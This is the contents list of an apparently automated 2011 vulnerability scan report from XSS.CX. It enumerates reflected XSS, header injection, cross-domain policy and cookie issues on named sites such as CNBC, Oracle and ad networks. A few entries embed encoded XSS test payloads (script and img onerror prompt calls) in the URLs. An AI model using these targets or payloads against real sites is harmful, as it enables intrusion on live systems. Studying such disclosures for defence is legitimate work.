XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-02

Report generated by XSS.CX at Tue Sep 06 16:07:58 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (stored)

2. HTTP header injection

2.1. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 2]

2.2. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO [REST URL parameter 3]

2.3. http://login.cnbc.com/tpauth/rest/authenticate [name of an arbitrarily supplied request parameter]

2.4. http://login.cnbc.com/tpauth/rest/authenticate [source parameter]

2.5. https://register.cnbc.com/memberCenter.do [name of an arbitrarily supplied request parameter]

2.6. https://register.cnbc.com/refreshlogin.jsp [name of an arbitrarily supplied request parameter]

2.7. https://register.cnbc.com/refreshlogin.jsp [source parameter]

2.8. https://register.cnbc.com/registerUser.do [name of an arbitrarily supplied request parameter]

3. Cross-site scripting (reflected)

3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

3.4. http://ads.rnmd.net/getAds [adDiv parameter]

3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.6. http://api-public.addthis.com/url/shares.json [callback parameter]

3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.8. http://api.bizographics.com/v1/profile.json [callback parameter]

3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]

3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]

3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]

3.14. http://api.viglink.com/api/ping [jsonp parameter]

3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.16. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.17. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.18. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.19. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.20. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.21. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.22. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.23. http://blog.harbottle.com/dm/index.php [name of an arbitrarily supplied request parameter]

3.24. http://blog.ulf-wendel.de/ [name of an arbitrarily supplied request parameter]

3.25. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.26. http://cdn.krxd.net/config/ [site parameter]

3.27. http://content.plymedia.com/initialize [video parameter]

3.28. http://d7.zedo.com/jsc/d3/fl.js [l parameter]

3.29. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js [l parameter]

3.30. http://digg.com/submit [REST URL parameter 1]

3.31. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc [dc parameter]

3.32. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_lang parameter]

3.33. http://education.oracle.com/pls/web_prod-plq-dad/demandcapture_customer.customer_display [p_wddi_id parameter]

3.34. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.35. http://education.oracle.com/pls/web_prod-plq-dad/header [lang parameter]

3.36. http://education.oracle.com/pls/web_prod-plq-dad/show_desc.redirect [p_url parameter]

3.37. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.38. http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main [p_lang parameter]

3.39. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.40. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.41. http://js.revsci.net/gateway/gw.js [csid parameter]

3.42. https://login.cnbc.com/cas/login [apphome parameter]

3.43. https://login.cnbc.com/cas/login [jsessionid parameter]

3.44. https://login.cnbc.com/cas/login [login_view parameter]

3.45. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.46. https://login.cnbc.com/cas/login [name of an arbitrarily supplied request parameter]

3.47. https://login.cnbc.com/cas/login [service parameter]

3.48. https://login.cnbc.com/cas/login [source parameter]

3.49. https://login.cnbc.com/cas/login [source_type parameter]

3.50. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.51. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

3.59. http://ping.crowdscience.com/ping.js [m parameter]

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]

3.65. http://search.cnbc.com/main.do [keywords parameter]

3.66. http://search.cnbc.com/main.do [keywords parameter]

3.67. http://search.cnbc.com/main.do [keywords parameter]

3.68. http://search.cnbc.com/main.do [keywords parameter]

3.69. http://search.cnbc.com/main.do [pubfreq parameter]

3.70. http://search.cnbc.com/main.do [pubfreq parameter]

3.71. http://search.cnbc.com/main.do [sort parameter]

3.72. http://search.cnbc.com/main.do [sort parameter]

3.73. http://serve.directdigitalllc.com/serve.php [click parameter]

3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]

3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]

3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]

3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]

3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]

3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

3.90. http://www.linkedin.com/countserv/count/share [url parameter]

3.91. http://www.sapient.com/en-us/search.html [search parameter]

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

3.96. http://optimized-by.rubiconproject.com/a/dk.html [ruid cookie]

3.97. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]

3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]

4. Flash cross-domain policy

4.1. http://a.tribalfusion.com/crossdomain.xml

4.2. http://a1.interclick.com/crossdomain.xml

4.3. http://action.mathtag.com/crossdomain.xml

4.4. http://ad.doubleclick.net/crossdomain.xml

4.5. http://admin.brightcove.com/crossdomain.xml

4.6. http://ads.pointroll.com/crossdomain.xml

4.7. http://ads.rnmd.net/crossdomain.xml

4.8. http://afe.specificclick.net/crossdomain.xml

4.9. http://ajax.googleapis.com/crossdomain.xml

4.10. http://altfarm.mediaplex.com/crossdomain.xml

4.11. http://at.amgdgt.com/crossdomain.xml

4.12. http://b.scorecardresearch.com/crossdomain.xml

4.13. http://c.betrad.com/crossdomain.xml

4.14. http://c.brightcove.com/crossdomain.xml

4.15. http://cache.specificmedia.com/crossdomain.xml

4.16. http://cdn.gigya.com/crossdomain.xml

4.17. http://cdn5.tribalfusion.com/crossdomain.xml

4.18. http://clk.fetchback.com/crossdomain.xml

4.19. http://content.links.channelintelligence.com/crossdomain.xml

4.20. http://content.plymedia.com/crossdomain.xml

4.21. http://core.insightexpressai.com/crossdomain.xml

4.22. http://d.adroll.com/crossdomain.xml

4.23. http://d.ads.readwriteweb.com/crossdomain.xml

4.24. http://d1.openx.org/crossdomain.xml

4.25. http://d7.zedo.com/crossdomain.xml

4.26. http://fls.doubleclick.net/crossdomain.xml

4.27. http://goku.brightcove.com/crossdomain.xml

4.28. http://gscounters.gigya.com/crossdomain.xml

4.29. http://ib.adnxs.com/crossdomain.xml

4.30. http://img-cdn.mediaplex.com/crossdomain.xml

4.31. http://imp.fetchback.com/crossdomain.xml

4.32. http://intelligence.marykay.com/crossdomain.xml

4.33. http://js.revsci.net/crossdomain.xml

4.34. http://l.betrad.com/crossdomain.xml

4.35. http://load.tubemogul.com/crossdomain.xml

4.36. http://log30.doubleverify.com/crossdomain.xml

4.37. http://netsuite.tt.omtrdc.net/crossdomain.xml

4.38. http://network.realmedia.com/crossdomain.xml

4.39. http://now.eloqua.com/crossdomain.xml

4.40. http://oimg.m.cnbc.com/crossdomain.xml

4.41. http://oimg.nbcuni.com/crossdomain.xml

4.42. http://omni.csc.com/crossdomain.xml

4.43. http://oracle.112.2o7.net/crossdomain.xml

4.44. http://oracleglobal.112.2o7.net/crossdomain.xml

4.45. http://oracleuniversity.112.2o7.net/crossdomain.xml

4.46. http://p.brilig.com/crossdomain.xml

4.47. http://pg.links.channelintelligence.com/crossdomain.xml

4.48. http://pg.links.origin.channelintelligence.com/crossdomain.xml

4.49. http://ping.crowdscience.com/crossdomain.xml

4.50. http://pix04.revsci.net/crossdomain.xml

4.51. http://pixel.adsafeprotected.com/crossdomain.xml

4.52. http://pixel.everesttech.net/crossdomain.xml

4.53. http://pixel.fetchback.com/crossdomain.xml

4.54. http://pixel.mathtag.com/crossdomain.xml

4.55. http://pixel.quantserve.com/crossdomain.xml

4.56. http://pro.cnbc.com/crossdomain.xml

4.57. http://r.casalemedia.com/crossdomain.xml

4.58. http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml

4.59. http://receive.inplay.tubemogul.com/crossdomain.xml

4.60. http://reviews.gillettevenus.com/crossdomain.xml

4.61. http://s0.2mdn.net/crossdomain.xml

4.62. http://search.twitter.com/crossdomain.xml

4.63. http://secure-us.imrworldwide.com/crossdomain.xml

4.64. http://services.plymedia.com/crossdomain.xml

4.65. http://speed.pointroll.com/crossdomain.xml

4.66. http://static.plymedia.com/crossdomain.xml

4.67. http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml

4.68. http://stats.deloitte.com/crossdomain.xml

4.69. http://statse.webtrendslive.com/crossdomain.xml

4.70. http://tags.bluekai.com/crossdomain.xml

4.71. http://tf.nexac.com/crossdomain.xml

4.72. http://ttwbs.channelintelligence.com/crossdomain.xml

4.73. http://wingateweb.112.2o7.net/crossdomain.xml

4.74. http://ad.wsod.com/crossdomain.xml

4.75. http://adadvisor.net/crossdomain.xml

4.76. http://ads.adsonar.com/crossdomain.xml

4.77. http://ads1.msn.com/crossdomain.xml

4.78. http://adx.g.doubleclick.net/crossdomain.xml

4.79. http://assets1.csc.com/crossdomain.xml

4.80. http://blogs.oracle.com/crossdomain.xml

4.81. http://bstats.adbrite.com/crossdomain.xml

4.82. http://channelsun.sun.com/crossdomain.xml

4.83. https://cms.paypal.com/crossdomain.xml

4.84. http://cnbc.com/crossdomain.xml

4.85. http://cvs.shoplocal.com/crossdomain.xml

4.86. http://data.cnbc.com/crossdomain.xml

4.87. http://developers.facebook.com/crossdomain.xml

4.88. http://disqus.com/crossdomain.xml

4.89. http://edge.sapient.com/crossdomain.xml

4.90. http://event.on24.com/crossdomain.xml

4.91. https://event.on24.com/crossdomain.xml

4.92. http://executivevision.cnbc.com/crossdomain.xml

4.93. http://js.adsonar.com/crossdomain.xml

4.94. http://login.cnbc.com/crossdomain.xml

4.95. https://login.cnbc.com/crossdomain.xml

4.96. http://m.cnbc.com/crossdomain.xml

4.97. http://media.cnbc.com/crossdomain.xml

4.98. http://msnbcmedia.msn.com/crossdomain.xml

4.99. http://optimized-by.rubiconproject.com/crossdomain.xml

4.100. http://pagead2.googlesyndication.com/crossdomain.xml

4.101. http://pi.pardot.com/crossdomain.xml

4.102. http://quote.cnbc.com/crossdomain.xml

4.103. http://rd.rlcdn.com/crossdomain.xml

4.104. http://search.cnbc.com/crossdomain.xml

4.105. http://server.iad.liveperson.net/crossdomain.xml

4.106. http://snas.nbcuni.com/crossdomain.xml

4.107. https://support.oracle.com/crossdomain.xml

4.108. http://symlookup.cnbc.com/crossdomain.xml

4.109. http://videometa.cnbc.com/crossdomain.xml

4.110. http://w.sharethis.com/crossdomain.xml

4.111. http://wd.sharethis.com/crossdomain.xml

4.112. http://www.apture.com/crossdomain.xml

4.113. http://www.atg.com/crossdomain.xml

4.114. https://www.atg.com/crossdomain.xml

4.115. http://www.cnbc.com/crossdomain.xml

4.116. http://www.csc.com/crossdomain.xml

4.117. http://www.deloitte.com/crossdomain.xml

4.118. http://www.facebook.com/crossdomain.xml

4.119. http://www.fetchback.com/crossdomain.xml

4.120. http://www.marykay.com/crossdomain.xml

4.121. http://www.msnbc.msn.com/crossdomain.xml

4.122. http://www.oracle.com/crossdomain.xml

4.123. http://www.oracleimg.com/crossdomain.xml

4.124. http://www.sapient.com/crossdomain.xml

4.125. http://www.youtube.com/crossdomain.xml

4.126. http://www2.znode.com/crossdomain.xml

4.127. http://1215.ic-live.com/crossdomain.xml

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml

4.129. http://api.twitter.com/crossdomain.xml

4.130. https://docs.google.com/crossdomain.xml

4.131. http://search.oracle.com/crossdomain.xml

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml

4.133. http://sun.edgeboss.net/crossdomain.xml

4.134. http://twitter.com/crossdomain.xml

4.135. http://www.covergirl.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

5.3. http://ads1.msn.com/clientaccesspolicy.xml

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml

5.6. http://oimg.m.cnbc.com/clientaccesspolicy.xml

5.7. http://oimg.nbcuni.com/clientaccesspolicy.xml

5.8. http://omni.csc.com/clientaccesspolicy.xml

5.9. http://oracle.112.2o7.net/clientaccesspolicy.xml

5.10. http://oracleglobal.112.2o7.net/clientaccesspolicy.xml

5.11. http://oracleuniversity.112.2o7.net/clientaccesspolicy.xml

5.12. http://pixel.quantserve.com/clientaccesspolicy.xml

5.13. http://s0.2mdn.net/clientaccesspolicy.xml

5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

5.15. http://speed.pointroll.com/clientaccesspolicy.xml

5.16. http://stats.deloitte.com/clientaccesspolicy.xml

5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml

5.18. http://cnbc.com/clientaccesspolicy.xml

5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml

5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml

5.21. http://media.cnbc.com/clientaccesspolicy.xml

5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml

5.23. http://www.cnbc.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://digg.com/submit

6.2. http://www.bigcommerce.com/freetrial.php

6.3. http://www.oraclecfo.com/Authentication/Login_w.html

6.4. http://www.oraclecfo.com/Main/Home/Home_w.html

6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

6.6. http://www.shopify.com/login

7. SSL cookie without secure flag set

7.1. https://forums.oracle.com/forums/adfAuthentication

7.2. https://forums.oracle.com/forums/category.jspa

7.3. https://forums.oracle.com/forums/guestsettings!default.jspa

7.4. https://forums.oracle.com/forums/index.jspa

7.5. https://forums.oracle.com/forums/login!withRedirect.jspa

7.6. https://forums.oracle.com/forums/main.jspa

7.7. https://register.cnbc.com/forgotPassword.do

7.8. https://register.cnbc.com/memberCenter.do

7.9. https://register.cnbc.com/registerUser.do

7.10. https://login.cnbc.com/cas/logout

7.11. https://login.oracle.com/favicon.ico

7.12. https://login.oracle.com/mysso/signon.jsp

7.13. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

7.14. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

7.15. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

7.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

7.17. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

7.18. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

7.23. https://login.oracle.com/mysso/sso_loginui/loginStyling.css

7.24. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

7.25. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

7.26. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

7.27. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

7.28. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

7.29. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

7.30. https://login.oracle.com/mysso/sso_loginui/sso_check.js

7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit

7.35. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

7.36. https://register.cnbc.com/

7.37. https://register.cnbc.com/RandomImage.jsp

7.38. https://register.cnbc.com/cas

7.39. https://register.cnbc.com/checkemail.do

7.40. https://register.cnbc.com/checkpassword.do

7.41. https://register.cnbc.com/checkscreenname.do

7.42. https://register.cnbc.com/checkzipcode.do

7.43. https://register.cnbc.com/createUser.do

7.44. https://register.cnbc.com/css/forgotPassword.css

7.45. https://register.cnbc.com/css/member_center_sytles.css

7.46. https://register.cnbc.com/css/newRegistration.css

7.47. https://register.cnbc.com/css/registration.css

7.48. https://register.cnbc.com/email/EmailSupport.jsp

7.49. https://register.cnbc.com/favicon.ico

7.50. https://register.cnbc.com/forgotPassword1.do

7.51. https://register.cnbc.com/forgotpassword1.jsp

7.52. https://register.cnbc.com/images/clickToContinue.gif

7.53. https://register.cnbc.com/images/loaderImage.gif

7.54. https://register.cnbc.com/images/memberCenterHeader.jpg

7.55. https://register.cnbc.com/images/submitPreferences.jpg

7.56. https://register.cnbc.com/images/tick.jpg

7.57. https://register.cnbc.com/images/tile_02.gif

7.58. https://register.cnbc.com/images/wrong.jpg

7.59. https://register.cnbc.com/js/membercenter.js

7.60. https://register.cnbc.com/js/prototype_ajax.js

7.61. https://register.cnbc.com/js/registrationBasic.js

7.62. https://register.cnbc.com/js/registrationUtils.js

7.63. https://register.cnbc.com/js/registrationValidations.js

7.64. https://register.cnbc.com/js/s_code.js

7.65. https://register.cnbc.com/js/validation.js

7.66. https://register.cnbc.com/quote-html-webservice/fvquote.htm

7.67. https://register.cnbc.com/quote-html-webservice/quote.htm

7.68. https://register.cnbc.com/refreshlogin.jsp

8. Session token in URL

8.1. http://blogs.oracle.com/roller-ui/cwpLogin.jsp

8.2. https://forums.oracle.com/forums/category.jspa

8.3. https://forums.oracle.com/forums/main.jspa

8.4. https://forums.oracle.com/forums/style/style.jsp

8.5. https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg

8.6. https://forums.oracle.com/forums/themes/english/resources/info_company.gif

8.7. https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif

8.8. https://forums.oracle.com/forums/themes/english/resources/otn_new.css

8.9. https://forums.oracle.com/forums/themes/english/resources/s_code.js

8.10. https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js

8.11. https://forums.oracle.com/forums/themes/english/resources/spacer.gif

8.12. https://forums.oracle.com/forums/themes/english/resources/style.css

8.13. http://l.sharethis.com/pview

8.14. https://login.cnbc.com/cas/login

8.15. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

8.16. https://myprofile.oracle.com/EndUser/adf/images/sibusy.gif

8.17. https://myprofile.oracle.com/EndUser/adf/images/siready.gif

8.18. https://myprofile.oracle.com/EndUser/adf/images/t.gif

8.19. https://myprofile.oracle.com/EndUser/adf/jsLibs/Common1_2_12_1.js

8.20. https://myprofile.oracle.com/EndUser/adf/styles/cache/profile-desktop-6nkike-en-ltr-webkit-cmp.css

8.21. https://myprofile.oracle.com/EndUser/images/fading-background.png

8.22. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

8.23. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

8.24. https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js

8.25. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

8.26. https://myprofile.oracle.com/EndUser/jscripts/s_validation.js

8.27. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard

8.28. http://www.apture.com/js/apture.js

8.29. http://www.atg.com/

8.30. http://www.atg.com/en/solutions/

8.31. http://www.atg.com/service/main.jsp

8.32. http://www.atg.com/service/main.jsp

8.33. https://www.atg.com/en/customers/listing/

8.34. https://www.atg.com/en/password/request/

8.35. https://www.atg.com/en/register/

8.36. https://www.atg.com/service/main.jsp

8.37. http://www.facebook.com/extern/login_status.php

8.38. http://www.google.com/search

8.39. http://www.oracle.com/us/technologies/virtualization/index.html

8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp

8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

8.42. http://www.readwriteweb.com/404.html

9. SSL certificate

9.1. https://account.bigcommerce.com/

9.2. https://myshopify.com/

9.3. https://support.bigcommerce.com/

9.4. https://www.bigcommerce.com/

9.5. https://bugzilla.mozilla.org/

9.6. https://cms.paypal.com/

9.7. https://deloitte.zettaneer.com/

9.8. https://dne.oracle.com/

9.9. https://docs.google.com/

9.10. https://education.oracle.com/

9.11. https://event.on24.com/

9.12. https://forms.netsuite.com/

9.13. https://forums.oracle.com/

9.14. https://login.cnbc.com/

9.15. https://login.oracle.com/

9.16. https://myprofile.oracle.com/

9.17. https://oracleus.wingateweb.com/

9.18. https://register.cnbc.com/

9.19. https://shop.oracle.com/

9.20. https://support.oracle.com/

9.21. https://www.atg.com/

9.22. https://www.cvs.com/

10. Password field submitted using GET method

11. ASP.NET ViewState without MAC enabled

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://convctr.overture.com/images/cc/cc.gif

12.3. http://pg.links.origin.channelintelligence.com/pages/wl.asp

12.4. http://pixel.everesttech.net/1688/i

12.5. http://ttwbs.channelintelligence.com/

12.6. http://a.tribalfusion.com/displayAd.js

12.7. http://a.tribalfusion.com/i.cid

12.8. http://a.tribalfusion.com/j.ad

12.9. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

12.10. http://a.tribalfusion.com/z/i.cid

12.11. http://ads.pointroll.com/PortalServe/

12.12. http://api.bizographics.com/v1/profile.redirect

12.13. http://b.scorecardresearch.com/b

12.14. http://c.statcounter.com/t.php

12.15. http://clk.fetchback.com/serve/fb/click

12.16. http://clk.fetchback.com/serve/fb/engmnt

12.17. https://cms.paypal.com/us/cgi-bin/

12.18. http://developers.facebook.com/plugins/

12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi

12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage

12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

12.22. http://imp.fetchback.com/serve/fb/adtag.js

12.23. http://imp.fetchback.com/serve/fb/imp

12.24. https://login.cnbc.com/cas/logout

12.25. http://m1215.ic-live.com/522/

12.26. http://m1460.ic-live.com/586/

12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js

12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js

12.30. http://optimized-by.rubiconproject.com/a/dk.html

12.31. http://optimized-by.rubiconproject.com/a/dk.js

12.32. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

12.33. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

12.34. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

12.35. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

12.36. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

12.37. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

12.38. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

12.39. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

12.40. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

12.41. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

12.42. http://p.brilig.com/contact/bct

12.43. http://pi.pardot.com/analytics

12.44. http://ping.crowdscience.com/ping.js

12.45. http://pixel.fetchback.com/serve/fb/pdc

12.46. http://pixel.quantserve.com/pixel

12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif

12.48. http://r.openx.net/img

12.49. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.50. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.51. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.52. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.53. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

12.54. http://r1-ads.ace.advertising.com/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

